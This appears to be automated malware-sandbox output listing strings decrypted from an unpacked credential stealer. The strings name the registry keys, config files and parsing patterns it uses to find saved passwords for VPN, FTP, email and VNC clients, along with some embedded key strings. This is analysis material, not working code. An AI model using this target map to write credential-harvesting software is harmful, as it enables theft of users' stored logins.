                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: APPDATA
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Psi+\profiles
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \accounts.xml
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \accounts.xml
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: OpenVPN
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: username
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: auth-data
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: entropy
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: USERPROFILE
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \OpenVPN\config\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: remote
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: remote
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: NordVPN
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: NordVPN
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: NordVpn.exe*
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: user.config
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: //setting[@name='Username']/value
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: //setting[@name='Password']/value
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: NordVPN
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Private Internet Access
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: %ProgramW6432%
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Private Internet Access\data
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Private Internet Access\data
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \account.json
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: .*"username":"(.*?)"
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: .*"password":"(.*?)"
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Private Internet Access
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: privateinternetaccess.com
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: FileZilla
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: APPDATA
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: APPDATA
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \FileZilla\recentservers.xml
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <Server>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <Host>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <Host>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </Host>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <Port>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </Port>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <User>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <User>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </User>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </Pass>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <Pass>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <Pass encoding="base64">
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </Pass>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: CoreFTP
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: User
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Host
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Port
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: hdfzpysvpzimorhk
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: WinSCP
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: HostName
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: UserName
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: PublicKeyFile
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: PortNumber
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: WinSCP
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ABCDEF
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Flash FXP
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: port
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: user
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: pass
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: quick.dat
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Sites.dat
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \FlashFXP\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \FlashFXP\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: FTP Navigator
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \FTP Navigator\Ftplist.txt
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Server
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: No Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: User
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SmartFTP
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: APPDATA
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: WS_FTP
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: appdata
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: HOST
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: PWD=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: PWD=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: FtpCommander
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SystemDrive
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \cftp\Ftplist.txt
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ;Password=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ;User=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ;Server=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ;Port=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ;Port=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ;Password=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ;User=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ;Anonymous=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: FTPGetter
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \FTPGetter\servers.xml
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <server>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <server_ip>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <server_ip>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </server_ip>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <server_port>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </server_port>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <server_user_name>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <server_user_name>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </server_user_name>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <server_user_password>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: <server_user_password>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: </server_user_password>
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: FTPGetter
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: The Bat!
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: appdata
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \The Bat!
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Account.CFN
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Account.CFN
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: +-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Becky!
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\RimArts\B2\Settings
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: DataDir
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Folder.lst
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Mailbox.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Account
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: PassWd
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Account
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SMTPServer
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Account
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: MailAddress
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Becky!
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Outlook
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Email
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: IMAP Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: POP3 Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: HTTP Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SMTP Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Email
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Email
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Email
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: IMAP Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: POP3 Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: HTTP Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SMTP Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Server
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Windows Mail App
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: COMPlus_legacyCorruptedStateExceptionsPolicy
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\Microsoft\ActiveSync\Partners
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Email
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Server
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SchemaId
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: pResourceElement
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: pIdentityElement
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: pPackageSid
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: syncpassword
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: mailoutgoing
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: FoxMail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Executable
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: FoxmailPath
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Storage\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Storage\
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \mail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \mail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \VirtualStore\Program Files\Foxmail\mail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \VirtualStore\Program Files (x86)\Foxmail\mail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Accounts\Account.rec0
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Account.stg
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Account.stg
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: POP3Host
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SMTPHost
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: IncomingServer
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Account
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: MailAddress
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: POP3Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Opera Mail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Opera Mail\Opera Mail\wand.dat
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: opera:
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: abcdefghijklmnopqrstuvwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: PocoMail
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: appdata
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Pocomail\accounts.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Email
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: POPPass
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SMTPPass
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SMTP
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: eM Client
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: eM Client\accounts.dat
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: eM Client
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Accounts
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: "Username":"
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: "Secret":"
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: 72905C47-F4FD-4CF7-A489-4E8121A155BD
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: "ProviderName":"
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: o6806642kbM7c5
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Mailbird
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SenderIdentities
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Accounts
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \Mailbird\Store\Store.db
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Server_Host
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Accounts
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Email
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Username
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: EncryptedPassword
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Mailbird
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SOFTWARE\Wow6432Node\RealVNC\WinVNC4
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SOFTWARE\RealVNC\vncserver
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: RealVNC 4.x
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: SOFTWARE\RealVNC\WinVNC4
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: RealVNC 3.x
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\ORL\WinVNC3
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: TightVNC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: TightVNC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: PasswordViewOnly
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: TightVNC ControlPassword
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\TightVNC\Server
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ControlPassword
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: TigerVNC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Software\TigerVNC\Server
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: Password
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: passwd
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ProgramFiles(x86)
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: passwd2
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: passwd
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ProgramFiles
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: \uvnc bvba\UltraVNC\ultravnc.ini
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: passwd2
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: UltraVNC
                        Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpackString decryptor: ProgramFiles
